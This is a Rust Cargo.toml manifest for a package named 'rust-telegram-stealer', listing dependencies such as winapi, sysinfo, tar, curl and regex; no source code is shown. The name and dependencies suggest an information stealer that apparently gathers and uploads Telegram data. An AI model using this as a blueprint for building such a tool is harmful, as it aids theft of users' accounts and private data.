[package]
name = "rust-telegram-stealer"
version = "0.1.0"
edition = "2021"

[dependencies]
uuid = {version = "1.4.1", features = ["v4"] }
winapi = { version = "0.3.9", features = ["winuser", "wincon"] }
user32-sys = "0.2.0"
sysinfo = "0.29.7"
tar = "0.4.38"
curl = "0.4.44"
regex = "1.5"